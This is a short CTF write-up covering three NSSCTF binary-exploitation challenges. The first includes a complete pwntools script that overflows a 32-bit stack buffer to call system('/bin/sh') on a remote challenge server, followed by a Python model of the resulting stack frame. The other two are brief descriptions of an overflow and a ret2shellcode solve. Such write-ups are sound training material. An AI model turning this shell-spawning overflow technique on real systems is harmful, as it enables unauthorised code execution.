WP 0x02

Published 2023-07-16 22:42:40 Author: Lu0

0x13 [HNCTF 2022 Week1]ezr0p32 id2930

The binary has system and gives you one special input opportunity, which is clearly a hint to write /bin/sh into .bss.

from pwn import *
from LibcSearcher import *
context(arch='i386',os='linux')
#context(log_level='debug')
#r=process("./ezr0p")
r=remote("node1.anna.nssctf.cn",28991)
elf=ELF("./ezr0p")
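sysaddr=elf.plt["system"]
flagaddr=0x0804a080  # .bss address where the name input ("/bin/sh") is stored
r.recvuntil(b"name")
r.sendline(b"/bin/sh")
# filler up to the saved return address, then system@plt, a dummy return address, and the argument pointer
payload=b'a'*0x20+p32(sysaddr)+p32(0xdeadbeef)+p32(flagaddr)
r.sendline(payload)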

r.interactive()
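
The 32-bit stack layout behind the payload above, as an added example that is not part of the original writeup: it models the `ret` of the overflowed function and shows why a dummy word sits between `system` and its argument. `SYSTEM_PLT` and `ESP_AT_RET` are constructed placeholder values; `0x0804a080` and the `0x20` offset come from the script.

```python
import struct

# Constructed placeholders for illustration (not read from the challenge binary).
SYSTEM_PLT = 0x08048400
ESP_AT_RET = 0xFFFFD000
# Values taken from the script above.
NAME_BUF = 0x0804A080   # .bss buffer holding "/bin/sh"
OFFSET = 0x20           # filler bytes before the saved return address


def build_frame(offset, func, fake_ret, arg):
    """Filler followed by a 32-bit cdecl call frame, little-endian."""
    return b"a" * offset + struct.pack("<III", func, fake_ret, arg)


def view_after_ret(payload, offset, esp_at_ret=ESP_AT_RET):
    """Model the overflowed function's `ret` and the callee's view of the stack.

    `ret` pops the first word into EIP and adds 4 to ESP. The callee then
    treats [esp] as its own return address and [esp+4] as its first argument,
    exactly as if it had been reached through a normal `call`.
    """
    if len(payload) < offset + 12:
        raise ValueError("payload too short for ret + fake ret + one argument")
    eip, callee_ret, arg1 = struct.unpack_from("<III", payload, offset)
    return {
        "eip": eip,                # popped by ret: control goes here
        "esp": esp_at_ret + 4,     # ESP after the pop
        "callee_ret": callee_ret,  # [esp]: where the callee would return
        "arg1": arg1,              # [esp+4]: first cdecl argument
    }


if __name__ == "__main__":
    frame = build_frame(OFFSET, SYSTEM_PLT, 0xDEADBEEF, NAME_BUF)
    for field, value in view_after_ret(frame, OFFSET).items():
        print(f"{field:>10} = {value:#010x}")
```
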

0x14 [GDOUCTF 2023]EASY PWN id3734

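Looking at the logic, it's a simple overflow overwrite.
...then I connected with nc, pressed that many a's, then pressed a 0 and Enter, and the flag came out right away.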

0x15 [HNCTF 2022 Week1]ret2shellcode id2934

A simple shellcode challenge. Tool + return, solved in one step. Too lazy to post the exp..